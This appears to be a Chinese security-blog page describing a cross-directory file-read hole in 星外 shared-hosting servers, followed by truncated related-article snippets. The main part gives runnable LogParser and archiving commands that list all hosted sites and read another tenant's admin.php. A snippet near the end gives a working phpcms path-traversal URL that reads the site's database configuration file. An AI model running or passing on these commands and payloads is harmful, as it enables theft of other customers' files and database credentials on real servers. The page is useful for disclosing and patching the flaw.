星外虚拟主机跨web目录文件读取漏洞

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe

这些文件貌似是星外处理日志、设置权限的,其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\*.*" -i:FS -rtp:-1

返回如下:

读取其中一个站的目录信息:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1

下面读取文件内容:

c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar

同样的还有rbs.exe

c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*

 

时间: 2024-10-24 15:43:53

星外虚拟主机跨web目录文件读取漏洞的相关文章

linux web目录文件全备脚本

#!/bin/bash#文件全备脚本#删除7天以前的文件#调用方法#yxy #www.sql8.net#[email protected]#2014-08-20#请主意所有路径都为全整目录#sh filebak.sh  要备份的目标目录 备份文件存放路径 保留文件的天数  #sh filebak.sh  /home/wd/wd/wd /home/wd/wd/bakup 7#sh filebak.sh  /home/dd/dd/dd /home/dd/dd/bakup 7 #pathpath=$1

Python实现随机延迟WEB目录文件扫描

搬了一年的砖,手糙得不会写代码了.闲来无聊写了个WEB目录文件扫描的小py,实现延迟随机时间,单线程,有WAF时挂个字典随机延迟扫着就行. 后期准备持续完善功能,集成一些常用的测试项,代码多了改成OO. 功能单一,主要练手,欢迎指正,代码如下: 1 # -*- coding: iso-8859-1 -*- 2 __author__ = 'BT' 3 4 import urllib2 5 import sys 6 import getopt 7 import time 8 import rando

PHPMailer命令执行及任意文件读取漏洞

今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下. PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033

TEC-004-php文件下载任意文件读取漏洞修复

修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd    function download() {        $u =$_GET['u'];        // 描述: 任意文件读取漏洞修复  date: 2017年4月28日 下午4:13:39  bylwy        $lenth=strrpos($u,'.');        $string = sub

【代码审计】两个任意文件读取漏洞实例

0x00 前言 0x01 漏洞实例一 环境搭建: XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源码下载:https://pan.baidu.com/s/13q_ITM0pPTGlkaNv8uq2Iw 代码分析: 1.漏洞文件位置:/App/Manage/Controller/TempletsController.class.php 第59-83行: public function edit() { $ft

tomcat中虚拟主机 、 web应用 、虚拟路径映射相关问题

1.虚拟主机:tomcat中可以配置管理多个网站,外界在访问这些网站时,并不知道这些网站是运行在同一个tomcat中的,感觉起来就像他们各自运行在各自的虚拟出来的主机中一样,所以将一个网站交给tomcat去管理的过程称为为tomcat配置一台虚拟主机. 2.web应用:一个虚拟主机包含着许多web资源,但这些web资源不能直接交给虚拟主机管理,需要按照 功能将web资源按照一定的目录结构组织成web应用再交给虚拟主机管理. 3.虚拟路径映射:将web应用交给虚拟主机管理,为web应用真实路径配置

Tomcat-Ajp协议文件读取漏洞(CVE-2020-1938)

简介:利用此漏洞,可以获取到WEB-INF下的web.xml信息 工具:CVE-2020-1938TomcatAjpScanner.py.tomcat环境.web站点 1.漏洞复现: python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146 '192.168.93.146'] /woaiqiukui 开始检测第1个ip Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest

调整网站安全狗配置让其适应星外虚拟主机管理系统环境

删除主动防御中,网站漏洞防护里的以下项: 1.防止对数据库进行数据删除操作 2.防止对数据库进行创建.删除.备份操作 在主动防御中,禁止IIS执行程序里添加以下项: 1.C:/php/php-cgi.exe 2.C:/windows/system32/cmd.exe 在主动防御中,危险组件防护中允许以下项: 1.WinNT 2.WinNTNamespace

phpcmsv9.15以下任意文件读取漏洞

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php 成功读取数据库信息如下: 爆网站路径: http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&